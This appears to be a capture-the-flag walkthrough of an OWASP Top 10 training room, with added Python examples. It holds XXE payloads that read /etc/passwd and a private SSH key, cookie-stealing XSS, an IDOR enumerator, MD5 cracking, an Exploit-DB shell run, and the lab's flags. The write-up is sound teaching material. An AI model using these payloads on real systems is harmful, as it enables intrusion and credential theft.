Hello!
This room is huge, it covers all of the OWASP Top 10, which are the Top 10 Web Application Security Risks according to the Open Web Application Security Project (OWASP) Foundation. Since there are so many tasks, I will keep the explanations rather short and might go more in-depth in individual posts later on.
Task 5 – Command Injection Practical
For this task there is already a web shell online at <ip>/evilshell.php, where you can just enter the commands.
What strange text file is in the website root directory?
ls
How many non-root/non-service/non-daemon users are there?
cat /etc/passwd
On Ubuntu, regular human users get a UID (and usually a GID) of 1000 or higher; system, service and daemon accounts sit below that. There is no entry with a UID of 1000 or more in this file, so the answer is 0.
What user is this app running as?
whoami
What is the user’s shell set as?
This is also shown in the /etc/passwd file: the shell is the last, colon-separated field of the user's entry.
What version of Ubuntu is running?
cat /etc/*release (or lsb_release -a)
Print out the MOTD. What favorite beverage is shown?
cat /etc/update-motd.d/00-header
run-parts /etc/update-motd.d
I tried these two commands, which print the MOTD, but for me there was no beverage in sight. But since we already found our drpepper.txt file… you guessed it, the answer is “Dr Pepper”.
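The web shell above is a deliberate one, but the same task is really about what happens when user input reaches a shell. Here is an added illustration written for this post (Python, not the room's PHP), with a vulnerable lookup next to a hardened one. The "lookup" feature, the hostname pattern and the attacker string are all constructed; echo stands in for the real tool so it runs offline.

```python
import re
import subprocess

# Added illustration in Python, not the room's evilshell.php. "echo" stands in
# for whatever tool the page would really call, so this runs offline.
HOSTNAME_RE = re.compile(r"[A-Za-z0-9.-]{1,253}")   # assumed allow-list for a hostname


def lookup_vulnerable(host):
    """Classic command injection: user input is glued into a shell string."""
    cmd = "echo looking up " + host
    return subprocess.run(cmd, shell=True, capture_output=True, text=True).stdout


def lookup_hardened(host):
    """Allow-list the input, then pass it as one argv element with no shell,
    so ';', '|', '$(...)' and friends are just characters in an argument."""
    if not HOSTNAME_RE.fullmatch(host):
        raise ValueError("invalid hostname: %r" % host)
    proc = subprocess.run(["echo", "looking up", host],
                          capture_output=True, text=True)
    return proc.stdout


def demo(payload="example.com; echo INJECTED"):
    """Constructed attacker input. Returns (vulnerable output, hardened verdict)."""
    vulnerable_output = lookup_vulnerable(payload)
    try:
        lookup_hardened(payload)
        verdict = "accepted"
    except ValueError:
        verdict = "rejected"
    return vulnerable_output, verdict


if __name__ == "__main__":
    output, verdict = demo()
    print("vulnerable version ran:\n" + output)
    print("hardened version:", verdict)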
Task 7 – Broken Authentication
What is the flag that you found in darren’s account?
First we try to register as “darren” and get an error, because that user already exists. But if you register as “ darren” (with a leading space) the duplicate check does not catch it, and when you log in with that new account you land in the “darren” account and see the flag. The fix is to normalise (trim) usernames before the uniqueness check and to use that same normalised value for the lookup at login.
fe86079416a21a3c99937fea8874b667
Now try to do the same trick and see if you can login as arthur.
Repeat the same trick with a leading space, and yes, you can.
What is the flag that you found in arthur’s account?
d9ac0f7db4fda460ac3edeb75d75e16e
Task 11 – Sensitive Data Exposure
Have a look around the webapp. The developer has left themselves a note indicating that there is sensitive data in a specific directory.
Okay, if we inspect the source of the site (right click, Inspect Element, or View Page Source) there is nothing on the main page, but the login page has a nice comment pointing to the directory:
Navigate to the directory you found in question one. What file stands out as being likely to contain sensitive data?
Just browse to /assets; directory listing is enabled there, and the file that stands out is webapp.db. Click on it to download it.
Use the supporting material to access the sensitive data. What is the password hash of the admin user?
Open the file with
sqlite3 webapp.db
and list the tables with
.tables
Then run
SELECT * FROM USERS;
and read the admin's hash from the output:
6eea9b7ef19179a06954edd0f6c05ceb
Paste that 32-character hex digest into crackstation.net, which identifies it as unsalted MD5, and you get the answer for the next question.
What is the admin’s plaintext password?
qwertyuiop
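The same steps done offline, as an added example written for this post (not the room's own material): a constructed in-memory stand-in for webapp.db with a USERS table, the equivalent of .tables and the SELECT, and a small dictionary attack on the unsalted MD5 hash. The table layout and the tiny wordlist are assumptions; only the admin hash is taken from the walkthrough.

```python
import hashlib
import sqlite3

ADMIN_HASH = "6eea9b7ef19179a06954edd0f6c05ceb"   # the hash from the lab's USERS table
WORDLIST = ["123456", "password", "letmein", "qwertyuiop", "dragon"]  # constructed, tiny


def build_sample_db():
    """Constructed stand-in for webapp.db: only a USERS table with two rows.
    The real schema is not reproduced here."""
    conn = sqlite3.connect(":memory:")
    conn.execute("CREATE TABLE USERS (userID TEXT, username TEXT, password TEXT)")
    conn.execute("INSERT INTO USERS VALUES ('1', 'admin', ?)", (ADMIN_HASH,))
    conn.execute("INSERT INTO USERS VALUES ('2', 'bob', ?)",
                 (hashlib.md5(b"letmein").hexdigest(),))
    conn.commit()
    return conn


def list_tables(conn):
    """Equivalent of the sqlite3 shell's .tables command."""
    rows = conn.execute("SELECT name FROM sqlite_master WHERE type = 'table'")
    return [name for (name,) in rows]


def dump_users(conn):
    """Equivalent of SELECT * FROM USERS; trimmed to (username, hash) pairs."""
    return conn.execute("SELECT username, password FROM USERS").fetchall()


def crack_md5(digest, wordlist):
    """Offline dictionary attack on an unsalted MD5 digest: hash each
    candidate and compare. Returns the plaintext or None."""
    digest = digest.lower()
    for word in wordlist:
        if hashlib.md5(word.encode()).hexdigest() == digest:
            return word
    return None


if __name__ == "__main__":
    db = build_sample_db()
    print("tables:", list_tables(db))
    for username, digest in dump_users(db):
        print(username, digest, "->", crack_md5(digest, WORDLIST))
```

Unsalted MD5 falls to this in microseconds per guess, which is why a lookup site can answer instantly; storing passwords with a slow, salted hash (bcrypt, scrypt or Argon2) is what makes a leaked table like this one survivable.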
Login as Admin. What is the flag?
After you login it is shown on the site – can’t miss it.
Task 13 XML External Entity
All of the answers can be found in the text explaining the task.
Full form of XML
extensible markup language
Is it compulsory to have XML prolog in XML documents?
no
Can we validate XML documents against a schema?
yes
How can we specify XML version and encoding in XML documents?
XML prolog
Task 14 XML External Entity – DTD
How do you define a new Element?
!ELEMENT
How do you define a ROOT element?
!DOCTYPE
How do you define a new ENTITY?
This one actually wasn't explained before this task, but it's like the others, with an exclamation mark:
!ENTITY
Task 15 XXE Payload
Try the payload mentioned in description.
Needs no answer, but if you copy the payload
<?xml version="1.0"?>
<!DOCTYPE root [<!ENTITY read SYSTEM 'file:///etc/passwd'>]>
<root>&read;</root>
into the field it will display the contents of /etc/passwd – nice.
Task 16 XXE Exploiting
Try to display your own name using any payload.
Again, no answer needed, but if you change the entity to
<!ENTITY read 'yourname'>
it will print yourname on the screen.
See if you can read the /etc/passwd file
Yes – already done that.
What is the name of the user in /etc/passwd
falcon
Where is falcon’s SSH key located?
So… I tried some things on this, like getting directory listings through the XXE, but couldn't get it working. But hey, look at this: it is just the standard location, under the home directory shown in the /etc/passwd entry:
/home/falcon/.ssh/id_rsa
What are the first 18 characters for falcon’s private key
Okay, so that's the most annoying thing about the in-browser attack box, at least on my computers: I can't copy stuff into it or out of it, not even text via the clipboard. But yeah, just point the entity's SYSTEM path at the id_rsa file like you did with /etc/passwd before, and there you have it.
Task 18 Broken Access Control – IDOR Challenge
Read and understand how IDOR works.
I believe in you.
Deploy the machine…
You can do it.
Look at other users notes. What is the flag?
Okay, once we are logged in we see a note=1 URL parameter. We can change it and try to access other notes… I fired up Burp Suite and got to 150 before I had the idea to try zero. That was it. Lesson for any IDOR hunt: probe the edge cases (0, negative numbers, very large values) before grinding upwards through the sequence.
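A small enumerator that bakes that lesson in, added here as example code written for this post rather than anything from the room: edge-case IDs go first, and responses are only kept when they differ from a known "nothing here" baseline. The fake backend and its dummy flag are constructed so the script runs offline; the real fetcher assumes the parameter is still called note and that your own session cookie authenticates the request.

```python
import urllib.error
import urllib.parse
import urllib.request


def candidate_ids(own_id, max_id):
    """IDs worth probing, edge cases first: 0 and a negative value, then
    everything from 1 to max_id except the note we already own."""
    yield 0
    yield -1
    for i in range(1, max_id + 1):
        if i != own_id:
            yield i


def probe(fetch, ids, baseline):
    """Call fetch(id) for each id and keep the responses that differ from the
    'nothing here' baseline. fetch returns a body string, or None on error."""
    hits = {}
    for note_id in ids:
        body = fetch(note_id)
        if body is not None and body != baseline:
            hits[note_id] = body
    return hits


def make_http_fetch(page_url, session_cookie):
    """Real fetcher for the lab. page_url is the notes page without its query
    string; the parameter name 'note' is the one seen in the URL above; the
    Cookie header carries your own session so the request is authenticated."""
    def fetch(note_id):
        query = urllib.parse.urlencode({"note": note_id})
        req = urllib.request.Request(page_url + "?" + query,
                                     headers={"Cookie": session_cookie})
        try:
            with urllib.request.urlopen(req, timeout=5) as resp:
                return resp.read().decode("utf-8", "replace")
        except urllib.error.HTTPError as err:
            return None if err.code == 404 else err.read().decode("utf-8", "replace")
        except urllib.error.URLError:
            return None
    return fetch


# Constructed fake backend so the script runs offline; the flag is a dummy.
FAKE_NOTES = {0: "flag{constructed-dummy}", 1: "my own note", 2: "another user's note"}
NOT_FOUND = "note not found"


def fake_fetch(note_id):
    return FAKE_NOTES.get(note_id, NOT_FOUND)


def demo():
    return probe(fake_fetch, candidate_ids(own_id=1, max_id=5), NOT_FOUND)


if __name__ == "__main__":
    for note_id, body in demo().items():
        print(note_id, "->", body)
```

Against the lab you would swap fake_fetch for make_http_fetch("http://<ip address>/<notes page>", "your session cookie") and pass the body of a known-missing note as the baseline; with a real target, keep max_id small and add a delay, since this is exactly the pattern the logging task at the end of the room is about spotting.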
Task 19 Security Misconfigurations
Hack into the webapp, and find the flag!
Well, I took some time to look around on the site, but there wasn't much to find, so guess what: I googled the name of the app, and it is actually on GitHub. On the GitHub page you find the default credentials pensive:PensiveNotes
and after you use them to login you are presented with the flag:
And if you are too lazy to solve it yourself or to type it, here it is:
thm{4b9513968fd564a87b28aa1f9d672e17}
Task 20 XSS Cross-Site Scripting
Navigate to <ip address> in your browser and click on the “Reflected XSS” tab on the navbar; craft a reflected XSS payload that will cause a popup saying “Hello”.
On the site is a search field; just enter <script>alert("Hello")</script>
and you get the flag. Nice.
ThereIsMoreToXSSThanYouThink
On the same reflective page, craft a reflected XSS payload that will cause a popup with your machine's IP address.
To get the IP of the machine, which is also the host of the website, you can use the window.location.hostname property. So we just alter the last payload to <script>alert(window.location.hostname)</script>
and get the flag.
ReflectiveXss4TheWin
Now navigate to <ip address> in your browser and click on the “Stored XSS” tab on the navbar; make an account. Then add a comment and see if you can insert some of your own html.
Okay, I just register as test:test and go to the page again. I try the “Hello” payload again and just post it as a comment… which works, but doesn't give me the flag. Or did it? After I add a <h1>"Hello"</h1> too, the flag is displayed, but not as a popup, just on the page. I might have just missed it after the first try.
On the same page, make an alert popup box appear on the page with your document cookies.
The cookies of a page are exposed through the document.cookie property, so if we alter the payload from before to <script>alert(document.cookie)</script>
and post it as a comment we get to see something like this:
And after that a pop up with the flag: W3LL_D0N3_LVL2
Change “XSS Playground” to “I am a hacker” by adding a comment and using Javascript.
So first we have to check how we can access the text in the header. If you inspect the HTML of the site, you find the id of the banner, thm-title:
Now we can use JavaScript to access this element by its id and change its innerHTML property, which is the displayed text. To do that we use our simple payload from before and change it a little bit again: <script>document.getElementById("thm-title").innerHTML="I am a hacker"</script>
which does the trick:
After that, the flag is revealed on the page, directly after the question.
websites_can_be_easily_defaced_with_xss
Another option would be <script>document.querySelector('#thm-title').textContent = 'I am a hacker'</script>, which is the hint. Note the difference: innerHTML parses its value as HTML, while textContent sets plain text, so textContent is the one to use in real code whenever the value is not fully trusted.
Task 21 Insecure Deserialization
Who developed the Tomcat application?
Google says: The Apache Software Foundation
What type of attack that crashes services can be performed with insecure deserialization?
Denial of Service
Task 22 Insecure Deserialization – Objects
If a dog was sleeping, would this be: a state or a behaviour?
If you ask me, it's a strange definition. Sleeping, for me, would be a state and going to sleep a behaviour… Like the lamp example, where switching the light would alter its state of being on or off… but whatever. The answer they want is:
a behaviour
Task 23 Insecure Deserialization – Deserialization
What is the name of the base-2 formatting that data is sent across a network as?
binary
Task 24 Insecure Deserialization – Cookies
If a cookie had the path of webapp.com/login, what would the URL that the user has to visit be?
webapp.com/login
What is the acronym for the web technology that Secure cookies work over?
https
Task 25 Insecure Deserialization – Cookies Practical
Open the webpage and click on “Exchange Today” to sign up. I use testuser:testpassword. Then check the “Storage” tab in your browser's developer tools (right click the page and select Inspect Element) to see the cookies. The sessionId is base64 encoded, so you can decode it with an online tool like CyberChef or in your terminal with base64 -d, and you get the first flag.
For the second flag you just have to change the userType cookie from user to admin: double click the value in the storage tab and type it in. Then head to <ip address>/admin and there it is. The real bug here is that the server trusts a cookie value the client controls for its authorisation decision, with nothing that lets it notice the edit.
Task 26 Insecure Deserialization – Code Execution
Okay, first change the cookie value back to user and head back to the /myprofile page. Then just follow the instructions of this task; they are very detailed. If you follow them correctly you get a reverse shell on the machine. There you just cd into the home directory and cat the flag.txt file.
Task 29 Components with Known Vulnerabilities – Lab
We get an app which we should exploit using publicly available material.
Okay, the first thing we see is this:
So I google “CSE Bookstore Vulnerability” and find two hits on Exploit-DB: an authentication bypass via SQL injection, with which we could log in to the admin panel (not what we want right now), and an unauthenticated remote code execution, which sounds nice. I downloaded it and executed it with
python3 47887.py http://10.10.243.37
and got a nice shell.
Then we just run wc -c /etc/passwd
which counts the bytes in the file, and get the answer to the question: 1611.
Task 30 Insufficient Logging and Monitoring
Well isn’t that a cute “log-file”. Pretty short but ok.
What IP address is the attacker using?
Just cat the file and it should be obvious.
It’s 49.99.13.16
What kind of attack is being carried out?
It is a “brute force” attack, where the attacker repeatedly tries username and password combinations until one works. A usable log records each failed attempt with a timestamp, the username tried and the source IP, which is exactly what lets you spot it.
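The eyeballing above scales to a few lines; for anything bigger you want the check automated. Here is an added example written for this post (not the room's log or any tool of theirs): a parser for a constructed log format and a sliding-window rule that flags any source IP with several failed logins in a short period. The sample lines are made up, reusing only the attacker IP from the answer above, and the format, threshold and window are all assumptions.

```python
import re
from collections import defaultdict
from datetime import datetime, timedelta

# Constructed sample lines in a made-up format; the room's real log file
# is not reproduced here.
SAMPLE_LOG = """\
2021-03-01 10:00:01 login failed user=admin src=49.99.13.16
2021-03-01 10:00:02 login failed user=admin src=49.99.13.16
2021-03-01 10:00:03 login failed user=root src=49.99.13.16
2021-03-01 10:00:04 login failed user=administrator src=49.99.13.16
2021-03-01 10:00:05 login success user=jsmith src=203.0.113.7
2021-03-01 10:00:06 login failed user=admin src=49.99.13.16
2021-03-01 10:00:09 login failed user=guest src=49.99.13.16
2021-03-01 10:04:10 login failed user=jsmith src=203.0.113.7
"""

LINE_RE = re.compile(
    r"^(?P<ts>\d{4}-\d{2}-\d{2} \d{2}:\d{2}:\d{2}) login (?P<result>failed|success) "
    r"user=(?P<user>\S+) src=(?P<src>\S+)$"
)


def parse(log_text):
    """Turn the raw text into a list of event dicts, skipping unparseable lines."""
    events = []
    for line in log_text.splitlines():
        m = LINE_RE.match(line)
        if not m:
            continue
        e = m.groupdict()
        e["ts"] = datetime.strptime(e["ts"], "%Y-%m-%d %H:%M:%S")
        events.append(e)
    return events


def brute_force_sources(events, threshold=5, window=timedelta(minutes=1)):
    """Flag any source IP with at least `threshold` failed logins inside a
    sliding time window. Returns {src: {"failures": n, "users": [...]}}."""
    failures = defaultdict(list)
    for e in events:
        if e["result"] == "failed":
            failures[e["src"]].append((e["ts"], e["user"]))
    flagged = {}
    for src, attempts in failures.items():
        attempts.sort()
        start = 0
        for end in range(len(attempts)):
            while attempts[end][0] - attempts[start][0] > window:
                start += 1           # slide the window forward
            if end - start + 1 >= threshold:
                flagged[src] = {
                    "failures": len(attempts),
                    "users": sorted({user for _, user in attempts}),
                }
                break
    return flagged


if __name__ == "__main__":
    for src, info in brute_force_sources(parse(SAMPLE_LOG)).items():
        print(f"{src}: {info['failures']} failed logins, usernames tried: {info['users']}")
```

The sliding window matters: a fixed "five failures per day" rule misses a fast burst just as easily as it fires on a forgetful user, whereas five failures inside one minute from one address, across several usernames, is hard to explain any other way. The one legitimate failure from 203.0.113.7 stays below the threshold and is left alone.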
So that’s it! A lot of different topics in this room, but it is a good overview!